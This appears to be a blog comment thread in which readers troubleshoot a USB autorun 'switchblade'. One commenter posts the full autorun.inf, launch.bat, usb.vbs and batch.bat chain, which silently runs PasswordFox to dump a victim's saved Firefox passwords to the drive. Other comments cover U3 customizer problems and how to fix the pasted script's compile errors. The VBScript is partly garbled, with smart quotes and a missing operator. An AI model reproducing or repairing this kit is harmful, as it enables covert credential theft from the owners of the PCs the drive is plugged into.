      Hey just wanted to tell you how to fix it if you haven’t already. Simply open up the .txt file go to File>Save As and save it as (name).(whatever it is) but you need to select All files under the text box to name it.

    I am having a slight problem and I was wondering if you could help!
    I have my U3 Usb, and i have all the files extracted into a folder and yes i am running xp. but when i go to make the autorun.inf, the launch.bat, and the usb.vbs file i type everything in right, but it just stays as a text file and doesn’t change automatically how yours does, just email me at ryanpushong88@gmail.com with any solutions! thanks!

    I have a Sandisk 4GB Cruzer, but any Universal Customizer I download can’t locate it. It prompts me to insert a U3 smart drive and run the program again. Can you help?
    Also I can’t find the universal customizer from the hak5 wiki mentioned in the hak5 thread, do you have a copy??

    Gentlefolks, it seems our friendly blogger, his good work aside, has been unable to update his blog. So, I’ve procured the info missing from his linked forum post (containing the .vbs script) for you below.

    Code for “autorun.inf”

    [AutoRun]
    open=launch.exe -a

    Code for “launch.bat”

    \usb.vbs

    Code for “usb.vbs”

    Dim oFSO, oDrive,objFolder,oDestination, shell
    Const USBDRIVE=1
    oDestination = “c:\test”
    Set oFSO = WScript.CreateObject(“Scripting.FileSystemObject”)
    Set shell=createobject(“wscript.shell”)
    ‘Get USB drive letter
    For Each oDrive In oFSO.Drives

    If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter “A” Then
    shell.run oDrive.DriveLetter & “:\batch.bat”
    set shell=nothing
    End If
    Next
    Sub CopyFiles(oPath, oDst)
    Set objFolder = oFSO.GetFolder(oPath)
    For Each Files In objFolder.Files
    WScript.Echo “Copying File”,Files
    newDst=oDst&”\”&Files.Name
    oFSO.CopyFile Files,newDst,True
    WScript.Echo Err.Description
    Next
    End Sub

    Code for batch.bat

    start %~dp0PasswordFox.exe /shtml %~dp0firefox.html

    when i have finished installing it try to use it, an error appears: windows Script Host Line 3 symbol 16.
    source Microsoft VBscript-compile error

  • Yoo // //

    don’t need replay, do not need it.

    • lewis e // //

      yoo how did you fix it

  • 0x // //

    This happens because the some of the font type of the characters you copied here, are incompatible with the compiler.

    The solution is quick and simple,: to open up the log file, and go to the line and character indicated in the error message.

    Highlight the mentioned character, and replace it manually (simply be entering it from your KEYBOARD)
    For example, if u look at line 3, symbol 16 (ie, the third line of code, and the 16th character, and that happens to be a “#” for example – you simple erase that, and type it in again.

    Save that, and re-do the process – each time you get an error, replace the appropriate character. After a few repeats of this, it will compile properly.
